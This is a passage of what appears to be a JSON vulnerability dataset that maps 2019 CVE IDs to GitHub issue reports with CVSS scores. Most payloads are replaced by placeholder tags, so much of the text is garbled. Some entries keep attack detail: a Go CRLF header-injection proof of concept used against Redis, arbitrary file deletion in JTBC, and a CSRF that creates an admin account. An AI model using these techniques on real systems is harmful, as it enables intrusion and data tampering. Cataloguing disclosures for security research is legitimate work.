  45339. "description": "There is a stored XSS vulnerability in yzmcms NUMBERTAG ulnerability description A xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG catname parameter, which allows remote attackers to inject arbitrary web script or HTML. poc xss payload: ERRORTAG FILETAG FILETAG FILETAG",
  45340. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45341. "severity": "MEDIUM",
  45342. "baseScore": 4.8,
  45343. "impactScore": 2.7,
  45344. "exploitabilityScore": 1.7
  45345. },
  45346. {
  45347. "CVE_ID": "CVE-2019-9661",
  45348. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/13",
  45349. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/13",
  45350. "Repo_new": "yzmcms/yzmcms",
  45351. "Issue_Created_At": "2019-03-09T01:37:00Z",
  45352. "description": "There is a stored XSS vulnerability in yzmcms NUMBERTAG ulnerability description A xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc xss payload: APITAG FILETAG FILETAG FILETAG",
  45353. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45354. "severity": "MEDIUM",
  45355. "baseScore": 4.8,
  45356. "impactScore": 2.7,
  45357. "exploitabilityScore": 1.7
  45358. },
  45359. {
  45360. "CVE_ID": "CVE-2019-9662",
  45361. "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/9",
  45362. "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/9",
  45363. "Repo_new": "jetiben/jtbc",
  45364. "Issue_Created_At": "2019-03-10T12:32:11Z",
  45365. "description": "There is a vulnerability that can delete unexpected critical files.. Vulnerability description An issue was discovered in JTBC(PHP NUMBERTAG It's cache management module is flawed. Arbitrary file ending in APITAG can be deleted via a PATHTAG FILETAG Change the param with the filename that we want to delete: FILETAG FILETAG FILETAG FILETAG Result: FILETAG JTBC(PHP) has many important files ends with \". APITAG this issues can damage the whole website: FILETAG FILETAG",
  45366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  45367. "severity": "HIGH",
  45368. "baseScore": 7.5,
  45369. "impactScore": 3.6,
  45370. "exploitabilityScore": 3.9
  45371. },
  45372. {
  45373. "CVE_ID": "CVE-2019-9688",
  45374. "Issue_Url_old": "https://github.com/forgeekscn/sftnow/issues/6",
  45375. "Issue_Url_new": "https://github.com/forgeekscn/sftnow/issues/6",
  45376. "Repo_new": "forgeekscn/sftnow",
  45377. "Issue_Created_At": "2019-03-09T15:11:48Z",
  45378. "description": "CSRF Vulneratbility to add admin account. POC is following code which clicked by admin will generate a superuser account called \"naive\" whose password is also \"naive\". APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG",
  45379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45380. "severity": "HIGH",
  45381. "baseScore": 8.8,
  45382. "impactScore": 5.9,
  45383. "exploitabilityScore": 2.8
  45384. },
  45385. {
  45386. "CVE_ID": "CVE-2019-9710",
  45387. "Issue_Url_old": "https://github.com/marshmallow-code/webargs/issues/371",
  45388. "Issue_Url_new": "https://github.com/marshmallow-code/webargs/issues/371",
  45389. "Repo_new": "marshmallow-code/webargs",
  45390. "Issue_Created_At": "2019-03-11T10:57:46Z",
  45391. "description": "Race conditions for parallel requests. I just noticed that something in webargs or marshmallow isn't thread safe. Take this minimal example\" CODETAG Run it with threading enabled: $ FLASK_APP=webargsrace.py flask run p NUMBERTAG with threads Now send two requests in parallel, with different values: $ http post URLTAG 'value=foo' & ; http post URLTAG 'value=bar' & The output from these two requests is: APITAG APITAG Clearly not what one would have expected! :bomb: The output of the print statement showing the request data and what the field receives confirms the issue: APITAG",
  45392. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45393. "severity": "HIGH",
  45394. "baseScore": 8.1,
  45395. "impactScore": 5.9,
  45396. "exploitabilityScore": 2.2
  45397. },
  45398. {
  45399. "CVE_ID": "CVE-2019-9736",
  45400. "Issue_Url_old": "https://github.com/cnxh/1024tools/issues/20",
  45401. "Issue_Url_new": "https://github.com/cnxh/1024tools/issues/20",
  45402. "Repo_new": "cnxh/1024tools",
  45403. "Issue_Created_At": "2019-03-07T04:47:52Z",
  45404. "description": "XSS vulnerability in APITAG label,SVG include attack vector.. This label and attack vector will cause dom based XSS. if you type APITAG APITAG \uff0cthe xss vulnerability will be triggered. FILETAG",
  45405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45406. "severity": "MEDIUM",
  45407. "baseScore": 6.1,
  45408. "impactScore": 2.7,
  45409. "exploitabilityScore": 2.8
  45410. },
  45411. {
  45412. "CVE_ID": "CVE-2019-9737",
  45413. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/662",
  45414. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/662",
  45415. "Repo_new": "pandao/editor.md",
  45416. "Issue_Created_At": "2019-03-07T03:35:34Z",
  45417. "description": "XSS vulnerability in APITAG label,SVG include attack vector.. This label and attack vector will cause dom based XSS. if you type CODETAG \uff0cthe xss vulnerability will be triggered. FILETAG",
  45418. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45419. "severity": "MEDIUM",
  45420. "baseScore": 6.1,
  45421. "impactScore": 2.7,
  45422. "exploitabilityScore": 2.8
  45423. },
  45424. {
  45425. "CVE_ID": "CVE-2019-9738",
  45426. "Issue_Url_old": "https://github.com/jimmykuu/gopher/issues/88",
  45427. "Issue_Url_new": "https://github.com/jimmykuu/gopher/issues/88",
  45428. "Repo_new": "jimmykuu/gopher",
  45429. "Issue_Created_At": "2019-03-12T07:54:03Z",
  45430. "description": "XSS vulnerability in APITAG label,SVG include attack vector.. This label and attack vector will cause dom based XSS. if you type APITAG APITAG \uff0cthe xss vulnerability will be triggered. FILETAG",
  45431. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45432. "severity": "MEDIUM",
  45433. "baseScore": 6.1,
  45434. "impactScore": 2.7,
  45435. "exploitabilityScore": 2.8
  45436. },
  45437. {
  45438. "CVE_ID": "CVE-2019-9741",
  45439. "Issue_Url_old": "https://github.com/golang/go/issues/30794",
  45440. "Issue_Url_new": "https://github.com/golang/go/issues/30794",
  45441. "Repo_new": "golang/go",
  45442. "Issue_Created_At": "2019-03-13T02:40:30Z",
  45443. "description": "net/http CRLF injection vulnerability. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOOS=\"linux\" PATHTAG GOPROXY=\"\" GORACE=\"\" PATHTAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" APITAG APITAG Principles The current implementation of APITAG does not encode the \u2018 \u2019 sequence in the query string, which allowed the attacker to manipulate a HTTP header with the \u2018 \u2019 sequence in it, so the attacker could insert arbitrary content to the new line of the HTTP header. What did you do? APITAG Consider the following Golong code snippet: package main import ( \"fmt\" \"net/http\" ) func APITAG { client := APITAG host := APITAG HTTP NUMBERTAG injected: header TEST NUMBERTAG url := \"http://\" + host + PATHTAG request, err := APITAG url, nil) if err != nil { APITAG error \") } resp, err := APITAG if err != nil { APITAG error \") } APITAG } In this script, the host parameter usually could be controlled by user, and the content of host above is exactly the payload. We setup a server using nc to open a NUMBERTAG port and to receive and display the HTTP request data from client , then run the code above on a client to sent a HTTP request to the server. nc l p NUMBERTAG GET /?a NUMBERTAG HTTP NUMBERTAG injected: header TEST: PATHTAG HTTP NUMBERTAG Host NUMBERTAG APITAG User Agent: Go http client NUMBERTAG Accept Encoding: gzip As you can see in the picture above , the nc server displayed the HTTP request with a manipulated header content:\u201d X injected:header\u201d, which means we successfully injected the HTTP header. In order to make the injected header available, we have to add an extra \u2018 \u2019 after the new header, so we add another parameter to contain the original parameter data, like \u2018TEST\u2019 in above sample. Attack Scenarios NUMBERTAG By crafting HTTP headers, it\u2019s possible to fool some web services NUMBERTAG It\u2019s also possible to attack several simple services like Redis, memcached. Let\u2019s take Redis as a example here: Adapt the script above to this: package main import ( \"fmt\" \"net/http\" ) func APITAG { client := APITAG host := APITAG SET test success \" url := \"http://\" + host + PATHTAG request, err := APITAG url, nil) if err != nil { APITAG error \") } resp, err := APITAG if err != nil { APITAG error \") } APITAG } We changed the injected header to a valid redis command, after executing this, we check the redis server: APITAG GET test \"success\" APITAG We can see that a \u201ctest\u201d key was inserted successfully. Conclusion The implementation of parameter handling of APITAG is vulnerable, which allows attacker to manipulate the HTTP header. Attacker who has ability to take control of the requesting address parameter of this library, could exploit this vulnerability to manipulate a HTTP header and attack an internal host like a normal Webserver, Memcached, Redis and so on.",
  45444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45445. "severity": "MEDIUM",
  45446. "baseScore": 6.1,
  45447. "impactScore": 2.7,
  45448. "exploitabilityScore": 2.8
  45449. },
  45450. {
  45451. "CVE_ID": "CVE-2019-9749",
  45452. "Issue_Url_old": "https://github.com/fluent/fluent-bit/issues/1135",
  45453. "Issue_Url_new": "https://github.com/fluent/fluent-bit/issues/1135",
  45454. "Repo_new": "fluent/fluent-bit",
  45455. "Issue_Created_At": "2019-02-25T16:27:34Z",
  45456. "description": "Memory corruption while processing MQTT input plugin leading to crash of the server. Fluent Bit MQTT input plugin acting as MQTT broker (server) incorrectly handles incoming network messages. After processing crafted packet plugin executes APITAG function with negative size param. That leads to crash of the whole Fluent Bit server via SIGSEGV signal. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: PATHTAG i mqtt t data o stdout m ' ' APITAG Fluent Bit NUMBERTAG Copyright (C) Treasure Data FILETAG",
  45457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  45458. "severity": "HIGH",
  45459. "baseScore": 7.5,
  45460. "impactScore": 3.6,
  45461. "exploitabilityScore": 3.9
  45462. },
  45463. {
  45464. "CVE_ID": "CVE-2019-9764",
  45465. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5519",
  45466. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5519",
  45467. "Repo_new": "hashicorp/consul",
  45468. "Issue_Created_At": "2019-03-20T10:50:50Z",
  45469. "description": "Something isn't right.... When filing a bug, please include the following headings if possible. Any example text in this template can be deleted. Overview of the Issue A paragraph or two about the issue you're experiencing. Reproduction Steps Steps to reproduce this issue, eg NUMBERTAG Create a cluster with n client nodes n and n server nodes NUMBERTAG Run APITAG NUMBERTAG iew error Consul info for both Client and Server APITAG APITAG info APITAG APITAG APITAG APITAG APITAG info APITAG APITAG APITAG Operating system and Environment details OS, Architecture, and any other information you can provide about the environment. Log Fragments Include appropriate Client or Server log fragments. If the log is longer than a few dozen lines, please include the URL to the FILETAG of the log instead of posting it in the issue. Use APITAG on the client and server to capture the maximum log detail.",
  45470. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  45471. "severity": "HIGH",
  45472. "baseScore": 7.4,
  45473. "impactScore": 5.2,
  45474. "exploitabilityScore": 2.2
  45475. },
  45476. {
  45477. "CVE_ID": "CVE-2019-9765",
  45478. "Issue_Url_old": "https://github.com/xpleaf/Blog_mini/issues/43",
  45479. "Issue_Url_new": "https://github.com/xpleaf/blog_mini/issues/43",
  45480. "Repo_new": "xpleaf/blog_mini",
  45481. "Issue_Created_At": "2019-03-14T02:09:05Z",
  45482. "description": "Cross Site Scripting Vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in PATHTAG APITAG function and PATHTAG NUMBERTAG line. Steps To Reproduce NUMBERTAG select one article detials, like: URLTAG NUMBERTAG find the article comment or create new comment. APITAG the comment, and the nikename is XSS APITAG APITAG alert NUMBERTAG APITAG ,then submit. FILETAG APITAG the reply button, trigger the payload.use this vulnerability, I can stealing admin cookies and more. FILETAG author by jin. EMAILTAG .cn",
  45483. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45484. "severity": "MEDIUM",
  45485. "baseScore": 6.1,
  45486. "impactScore": 2.7,
  45487. "exploitabilityScore": 2.8
  45488. },
  45489. {
  45490. "CVE_ID": "CVE-2019-9768",
  45491. "Issue_Url_old": "https://github.com/thinkst/canarytokens/issues/35",
  45492. "Issue_Url_new": "https://github.com/thinkst/canarytokens/issues/35",
  45493. "Repo_new": "thinkst/canarytokens",
  45494. "Issue_Created_At": "2019-03-13T10:30:05Z",
  45495. "description": "APITAG Detection Bypass (MS WORD). This was reported to EMAILTAG NUMBERTAG days ago. Please confirm and fix these issues, also I'd really like a version number. Reported by Gionathan Armando Reale Identification: Due to PATHTAG being very limited in variation it is easily possible to detect which Word documents are likely to contain APITAG Detection Bypass: Opening a Word document containing a APITAG using Protected View will allow you to view the file without triggering the APITAG Opening the Word document with Libreoffice Writer NUMBERTAG will allow you to view the file without triggering the APITAG Other document viewers may also bypass detection.",
  45496. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45497. "severity": "HIGH",
  45498. "baseScore": 7.5,
  45499. "impactScore": 3.6,
  45500. "exploitabilityScore": 3.9
  45501. },
  45502. {
  45503. "CVE_ID": "CVE-2019-9770",
  45504. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/99",
  45505. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/99",
  45506. "Repo_new": "libredwg/libredwg",
  45507. "Issue_Created_At": "2019-03-12T10:51:26Z",
  45508. "description": "serveral bugs in APITAG libredwg version libredwg NUMBERTAG and NUMBERTAG description txt libredwg download link URLTAG APITAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LEADER at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG bit_read_B MENTIONTAG description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an out of bounds read in function bit_read_B at commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_decode_eed_data at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_dxf_LTYPE at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dxf_header_write at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG dwg_dxf_LTYPE MENTIONTAG description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LTYPE at commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LTYPE at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function bit_convert_TU at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_decode_eed_data at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG out of bounds read description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an out of bounds read in function dwg_dxf_BLOCK_CONTROL at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG FILETAG And a same report send to APITAG CVETAG",
  45509. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  45510. "severity": "HIGH",
  45511. "baseScore": 7.5,
  45512. "impactScore": 3.6,
  45513. "exploitabilityScore": 3.9
  45514. },
  45515. {
  45516. "CVE_ID": "CVE-2019-9785",
  45517. "Issue_Url_old": "https://github.com/zhaopengme/gitnote/issues/209",
  45518. "Issue_Url_new": "https://github.com/zhaopengme/gitnote/issues/209",
  45519. "Repo_new": "zhaopengme/gitnote",
  45520. "Issue_Created_At": "2019-03-14T05:42:14Z",
  45521. "description": "malicious markdown file can cause RCE. Describe the bug A malicious markdown file can cause remote code execute\u3002 To Reproduce Steps to reproduce the behavior NUMBERTAG clone the respository to local place NUMBERTAG open the malicious file Expected behavior if the file contains malicious code, it will be executed\u3002 Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: mac os version NUMBERTAG B NUMBERTAG ersion: version NUMBERTAG B NUMBERTAG",
  45522. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45523. "severity": "HIGH",
  45524. "baseScore": 7.8,
  45525. "impactScore": 5.9,
  45526. "exploitabilityScore": 1.8
  45527. },
  45528. {
  45529. "CVE_ID": "CVE-2019-9834",
  45530. "Issue_Url_old": "https://github.com/netdata/netdata/issues/5800",
  45531. "Issue_Url_new": "https://github.com/netdata/netdata/issues/5800",
  45532. "Repo_new": "netdata/netdata",
  45533. "Issue_Created_At": "2019-04-04T12:24:56Z",
  45534. "description": "CVETAG . We're running your nightly release APITAG rc NUMBERTAG nightly). Has this issue been addressed already? I couldn't find another issue about this cve. CVETAG",
  45535. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45536. "severity": "MEDIUM",
  45537. "baseScore": 6.1,
  45538. "impactScore": 2.7,
  45539. "exploitabilityScore": 2.8
  45540. },
  45541. {
  45542. "CVE_ID": "CVE-2019-9837",
  45543. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper-openid_connect/issues/61",
  45544. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper-openid_connect/issues/61",
  45545. "Repo_new": "doorkeeper-gem/doorkeeper-openid_connect",
  45546. "Issue_Created_At": "2019-02-07T01:06:49Z",
  45547. "description": "Open redirect vulnerability when APITAG .",
  45548. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45549. "severity": "MEDIUM",
  45550. "baseScore": 6.1,
  45551. "impactScore": 2.7,
  45552. "exploitabilityScore": 2.8
  45553. },
  45554. {
  45555. "CVE_ID": "CVE-2019-9843",
  45556. "Issue_Url_old": "https://github.com/diffplug/spotless/issues/358",
  45557. "Issue_Url_new": "https://github.com/diffplug/spotless/issues/358",
  45558. "Repo_new": "diffplug/spotless",
  45559. "Issue_Created_At": "2019-02-13T20:52:58Z",
  45560. "description": "The XML parser isn't respecting APITAG as false. Original Comment: URLTAG > CODETAG If we are seeing HTTP get requests inside of the XML parser that means that the parser is vulnerable to XXE URLTAG . We need to fix this so that the spotless XML formatter is not making external entity requests. We can't have our linting infrastructure making web requests. Especially web requests over HTTP as those can be maliciously intercepted by a MITM. Here's an example where this has been a serious problem in the past. URLTAG CC: MENTIONTAG This is a security vulnerability in spotless and should be treated as such.",
  45561. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45562. "severity": "HIGH",
  45563. "baseScore": 7.5,
  45564. "impactScore": 5.9,
  45565. "exploitabilityScore": 1.6
  45566. },
  45567. {
  45568. "CVE_ID": "CVE-2019-9870",
  45569. "Issue_Url_old": "https://github.com/w8tcha/CKEditor-oEmbed-Plugin/issues/94",
  45570. "Issue_Url_new": "https://github.com/w8tcha/ckeditor-oembed-plugin/issues/94",
  45571. "Repo_new": "w8tcha/ckeditor-oembed-plugin",
  45572. "Issue_Created_At": "2019-03-12T15:34:23Z",
  45573. "description": "Issue within the APITAG APITAG Plugin. Hi W8tcha, I discovered an issue within the APITAG plugin but I would not like to disclose it here. Is there a way to come in contact with you via your work email? Kind Regards, Ioannis Adamos",
  45574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45575. "severity": "CRITICAL",
  45576. "baseScore": 9.8,
  45577. "impactScore": 5.9,
  45578. "exploitabilityScore": 3.9
  45579. },
  45580. {
  45581. "CVE_ID": "CVE-2019-9878",
  45582. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/46",
  45583. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/46",
  45584. "Repo_new": "kermitt2/pdfalto",
  45585. "Issue_Created_At": "2019-03-13T07:19:33Z",
  45586. "description": "invalid memory access in APITAG ). Description we observed a invalid memory access in function APITAG ) located in APITAG APITAG same be triggered by sending a crafted pdf file to the pdfalto binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command : ./pdfalto f NUMBERTAG l NUMBERTAG APITAG APITAG outline annotation APITAG blocks APITAG ocr APITAG $POC POC REPRODUCER URLTAG Degub ERRORTAG",
  45587. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45588. "severity": "HIGH",
  45589. "baseScore": 7.8,
  45590. "impactScore": 5.9,
  45591. "exploitabilityScore": 1.8
  45592. },
  45593. {
  45594. "CVE_ID": "CVE-2019-9893",
  45595. "Issue_Url_old": "https://github.com/seccomp/libseccomp/issues/139",
  45596. "Issue_Url_new": "https://github.com/seccomp/libseccomp/issues/139",
  45597. "Repo_new": "seccomp/libseccomp",
  45598. "Issue_Created_At": "2019-02-18T18:32:14Z",
  45599. "description": "BUG: APITAG . Placeholder for a bug, details TBD.",
  45600. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45601. "severity": "CRITICAL",
  45602. "baseScore": 9.8,
  45603. "impactScore": 5.9,
  45604. "exploitabilityScore": 3.9
  45605. },
  45606. {
  45607. "CVE_ID": "CVE-2019-9900",
  45608. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6434",
  45609. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6434",
  45610. "Repo_new": "envoyproxy/envoy",
  45611. "Issue_Created_At": "2019-03-29T17:02:25Z",
  45612. "description": "Reserved issue for pending security disclosure NUMBERTAG TBA",
  45613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
  45614. "severity": "HIGH",
  45615. "baseScore": 8.3,
  45616. "impactScore": 3.7,
  45617. "exploitabilityScore": 3.9
  45618. },
  45619. {
  45620. "CVE_ID": "CVE-2019-9901",
  45621. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6435",
  45622. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6435",
  45623. "Repo_new": "envoyproxy/envoy",
  45624. "Issue_Created_At": "2019-03-29T17:03:07Z",
  45625. "description": "Reserved issue for pending security disclosure NUMBERTAG TBA",
  45626. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  45627. "severity": "CRITICAL",
  45628. "baseScore": 10.0,
  45629. "impactScore": 6.0,
  45630. "exploitabilityScore": 3.9
  45631. },
  45632. {
  45633. "CVE_ID": "CVE-2019-9915",
  45634. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300",
  45635. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1300",
  45636. "Repo_new": "getsimplecms/getsimplecms",
  45637. "Issue_Created_At": "2018-11-12T12:15:27Z",
  45638. "description": "Advisory from Netsparker APITAG Open Redirection. Hello, While testing the Netsparker web application security scanner we identified a Open Redirection vulnerability in APITAG Can you please advise whom shall we contact to disclose the vulnerability details so it can be fixed? Please email me at EMAILTAG for the technical details. Looking forward to hearing from you. Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner",
  45639. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45640. "severity": "MEDIUM",
  45641. "baseScore": 6.1,
  45642. "impactScore": 2.7,
  45643. "exploitabilityScore": 2.8
  45644. },
  45645. {
  45646. "CVE_ID": "CVE-2019-9927",
  45647. "Issue_Url_old": "https://github.com/careteditor/issues/issues/862",
  45648. "Issue_Url_new": "https://github.com/careteditor/issues/issues/862",
  45649. "Repo_new": "careteditor/issues",
  45650. "Issue_Created_At": "2019-02-21T17:10:10Z",
  45651. "description": "Remote Code Execution . Title: Caret Version NUMBERTAG rc NUMBERTAG is vulnerable to remote code execution. Description: Caret Version NUMBERTAG rc NUMBERTAG allows the execution of arbitrary APITAG and has the ability to start system processes without user interaction. APITAG Code: ERRORTAG APITAG Code (un evaled): ERRORTAG Screenshot: FILETAG",
  45652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45653. "severity": "CRITICAL",
  45654. "baseScore": 9.8,
  45655. "impactScore": 5.9,
  45656. "exploitabilityScore": 3.9
  45657. },
  45658. {
  45659. "CVE_ID": "CVE-2019-9956",
  45660. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1523",
  45661. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1523",
  45662. "Repo_new": "imagemagick/imagemagick",
  45663. "Issue_Created_At": "2019-03-22T10:37:33Z",
  45664. "description": "stack buffer overflow in APITAG of ps.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a stack buffer overflow vulnerability in APITAG of ps.c which could lead to code execution. Steps to Reproduce APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG f2]f2 f2 f NUMBERTAG APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG APITAG NUMBERTAG b NUMBERTAG aa NUMBERTAG APITAG NUMBERTAG b NUMBERTAG ab NUMBERTAG APITAG NUMBERTAG b NUMBERTAG ac NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  45665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45666. "severity": "HIGH",
  45667. "baseScore": 8.8,
  45668. "impactScore": 5.9,
  45669. "exploitabilityScore": 2.8
  45670. },
  45671. {
